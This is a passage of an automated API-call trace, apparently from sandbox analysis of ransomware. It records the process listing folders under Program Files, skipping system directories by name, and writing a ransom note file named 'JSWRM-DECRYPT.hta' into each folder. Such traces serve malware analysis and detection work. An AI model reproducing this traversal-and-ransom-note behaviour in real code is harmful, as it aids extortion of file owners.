Files\\microsoft shared\\VC\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\jswrm-decrypt.hta")) returned 0xffffffff [0068.941] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2175c0 | out: hHeap=0x1e0000) returned 1 [0068.941] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.941] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345be5c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.941] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0068.941] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24c1d0 [0068.941] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0068.941] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24dfa0 [0068.941] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0068.941] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209170 [0068.941] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217e00 [0068.941] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209170 | out: hHeap=0x1e0000) returned 1 [0068.941] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VC\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0068.943] SetFilePointer (in: hFile=0x298, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.943] WriteFile (in: hFile=0x298, lpBuffer=0x345bf70*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bf3c, lpOverlapped=0x0 | out: lpBuffer=0x345bf70*, lpNumberOfBytesWritten=0x345bf3c*=0x230c, lpOverlapped=0x0) returned 1 [0068.944] CloseHandle (hObject=0x298) returned 1 [0068.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217e00 | out: hHeap=0x1e0000) returned 1 [0068.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24dfa0 | out: hHeap=0x1e0000) returned 1 [0068.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209800 | out: hHeap=0x1e0000) returned 1 [0068.944] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0068.944] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209620 [0068.944] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209170 [0068.944] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209260 [0068.944] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217300 [0068.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209260 | out: hHeap=0x1e0000) returned 1 [0068.944] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VC\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\jswrm-decrypt.hta")) returned 0x20 [0068.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217300 | out: hHeap=0x1e0000) returned 1 [0068.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209170 | out: hHeap=0x1e0000) returned 1 [0068.944] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209260 [0068.944] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VC\\*.*", lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0xbcd0fab8, ftCreationTime.dwHighDateTime=0x1d327b7, ftLastAccessTime.dwLowDateTime=0xa0b594b8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1fc1d2bf, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName=".", cAlternateFileName="")) returned 0x231c00 [0068.944] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0068.944] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0xbcd0fab8, ftCreationTime.dwHighDateTime=0x1d327b7, ftLastAccessTime.dwLowDateTime=0xa0b594b8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1fc1d2bf, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="..", cAlternateFileName="")) returned 1 [0068.945] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0068.945] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0068.945] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1fc1d2bf, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1fc1d2bf, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1fc1d2bf, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0068.945] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0068.945] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0068.945] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0068.945] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0068.945] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0068.945] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0068.945] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0068.945] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0068.945] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0068.945] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0068.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0068.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2412e0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0068.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209260 | out: hHeap=0x1e0000) returned 1 [0068.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0068.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0068.945] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd8127e00, ftCreationTime.dwHighDateTime=0x1cbd076, ftLastAccessTime.dwLowDateTime=0xcd0a4098, ftLastAccessTime.dwHighDateTime=0x1d327b7, ftLastWriteTime.dwLowDateTime=0xd8127e00, ftLastWriteTime.dwHighDateTime=0x1cbd076, nFileSizeHigh=0x0, nFileSizeLow=0xf1b50, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="msdia100.dll", cAlternateFileName="")) returned 1 [0068.945] lstrcmpiW (lpString1="msdia100.dll", lpString2=".") returned 1 [0068.945] lstrcmpiW (lpString1="msdia100.dll", lpString2="..") returned 1 [0068.945] lstrcmpiW (lpString1="msdia100.dll", lpString2="...") returned 1 [0068.945] lstrcmpiW (lpString1="msdia100.dll", lpString2="windows") returned -1 [0068.945] lstrcmpiW (lpString1="msdia100.dll", lpString2="recovery") returned -1 [0068.945] lstrcmpiW (lpString1="msdia100.dll", lpString2="perflogs") returned -1 [0068.945] lstrcmpiW (lpString1="msdia100.dll", lpString2="documents and settings") returned 1 [0068.946] lstrcmpiW (lpString1="msdia100.dll", lpString2="$RECYCLE.BIN") returned 1 [0068.946] lstrcmpiW (lpString1="msdia100.dll", lpString2="system volume information") returned -1 [0068.946] lstrcmpiW (lpString1="msdia100.dll", lpString2="msocache") returned -1 [0068.946] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0068.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msdia100.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0068.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msdia100.dll", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msdia100.dll", lpUsedDefaultChar=0x0) returned 12 [0068.946] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0068.946] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0068.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msdia100.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0068.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msdia100.dll", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msdia100.dll", lpUsedDefaultChar=0x0) returned 12 [0068.946] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0068.946] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0068.946] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.946] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfe87c00, ftCreationTime.dwHighDateTime=0x1cbfe36, ftLastAccessTime.dwLowDateTime=0x2ce22546, ftLastAccessTime.dwHighDateTime=0x1d327be, ftLastWriteTime.dwLowDateTime=0xcfe87c00, ftLastWriteTime.dwHighDateTime=0x1cbfe36, nFileSizeHigh=0x0, nFileSizeLow=0xd0d50, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="msdia90.dll", cAlternateFileName="")) returned 1 [0068.946] lstrcmpiW (lpString1="msdia90.dll", lpString2=".") returned 1 [0068.946] lstrcmpiW (lpString1="msdia90.dll", lpString2="..") returned 1 [0068.946] lstrcmpiW (lpString1="msdia90.dll", lpString2="...") returned 1 [0068.946] lstrcmpiW (lpString1="msdia90.dll", lpString2="windows") returned -1 [0068.946] lstrcmpiW (lpString1="msdia90.dll", lpString2="recovery") returned -1 [0068.946] lstrcmpiW (lpString1="msdia90.dll", lpString2="perflogs") returned -1 [0068.946] lstrcmpiW (lpString1="msdia90.dll", lpString2="documents and settings") returned 1 [0068.946] lstrcmpiW (lpString1="msdia90.dll", lpString2="$RECYCLE.BIN") returned 1 [0068.946] lstrcmpiW (lpString1="msdia90.dll", lpString2="system volume information") returned -1 [0068.946] lstrcmpiW (lpString1="msdia90.dll", lpString2="msocache") returned -1 [0068.946] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0068.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msdia90.dll", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0068.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msdia90.dll", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msdia90.dll", lpUsedDefaultChar=0x0) returned 11 [0068.946] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0068.946] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0068.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msdia90.dll", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0068.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msdia90.dll", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msdia90.dll", lpUsedDefaultChar=0x0) returned 11 [0068.946] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0068.946] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0068.946] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0068.946] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfe87c00, ftCreationTime.dwHighDateTime=0x1cbfe36, ftLastAccessTime.dwLowDateTime=0x2ce22546, ftLastAccessTime.dwHighDateTime=0x1d327be, ftLastWriteTime.dwLowDateTime=0xcfe87c00, ftLastWriteTime.dwHighDateTime=0x1cbfe36, nFileSizeHigh=0x0, nFileSizeLow=0xd0d50, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="msdia90.dll", cAlternateFileName="")) returned 0 [0068.947] FindClose (in: hFindFile=0x231c00 | out: hFindFile=0x231c00) returned 1 [0068.947] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0068.947] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209620 | out: hHeap=0x1e0000) returned 1 [0068.947] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0068.947] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0b59a78, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x71169cb5, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22c3c4, cFileName="VGX", cAlternateFileName="")) returned 1 [0068.947] lstrcmpiW (lpString1="VGX", lpString2=".") returned 1 [0068.947] lstrcmpiW (lpString1="VGX", lpString2="..") returned 1 [0068.947] lstrcmpiW (lpString1="VGX", lpString2="...") returned 1 [0068.947] lstrcmpiW (lpString1="VGX", lpString2="windows") returned -1 [0068.947] lstrcmpiW (lpString1="VGX", lpString2="recovery") returned 1 [0068.947] lstrcmpiW (lpString1="VGX", lpString2="perflogs") returned 1 [0068.947] lstrcmpiW (lpString1="VGX", lpString2="documents and settings") returned 1 [0068.947] lstrcmpiW (lpString1="VGX", lpString2="$RECYCLE.BIN") returned 1 [0068.947] lstrcmpiW (lpString1="VGX", lpString2="system volume information") returned 1 [0068.947] lstrcmpiW (lpString1="VGX", lpString2="msocache") returned 1 [0068.947] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209170 [0068.947] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0068.947] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0068.947] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2257f0 [0068.947] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.947] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2257f0 | out: hHeap=0x1e0000) returned 1 [0068.947] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VGX\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\vgx\\jswrm-decrypt.hta")) returned 0xffffffff [0068.947] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.947] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.947] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345be5c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.947] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0068.947] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24c1d0 [0068.947] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0068.947] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24dfa0 [0068.947] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0068.947] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0068.948] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.948] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0068.948] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VGX\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\vgx\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0068.948] SetFilePointer (in: hFile=0x298, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.948] WriteFile (in: hFile=0x298, lpBuffer=0x345bf70*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bf3c, lpOverlapped=0x0 | out: lpBuffer=0x345bf70*, lpNumberOfBytesWritten=0x345bf3c*=0x230c, lpOverlapped=0x0) returned 1 [0068.949] CloseHandle (hObject=0x298) returned 1 [0068.949] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.949] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24dfa0 | out: hHeap=0x1e0000) returned 1 [0068.949] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0068.949] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209260 [0068.949] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209800 [0068.949] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209440 [0068.949] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0068.949] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.949] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0068.949] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VGX\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\vgx\\jswrm-decrypt.hta")) returned 0x20 [0068.949] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.949] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209440 | out: hHeap=0x1e0000) returned 1 [0068.950] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0068.950] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VGX\\*.*", lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0b59a78, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1fc1d2bf, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName=".", cAlternateFileName="")) returned 0x2320c0 [0068.950] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0068.950] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0b59a78, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1fc1d2bf, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="..", cAlternateFileName="")) returned 1 [0068.950] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0068.950] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0068.950] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1fc1d2bf, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1fc1d2bf, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1fc1d2bf, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0068.950] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0068.950] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0068.950] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0068.950] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0068.950] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0068.950] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0068.950] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0068.950] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0068.950] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0068.950] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0068.950] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.950] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.950] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0068.950] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241218, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.950] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.950] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 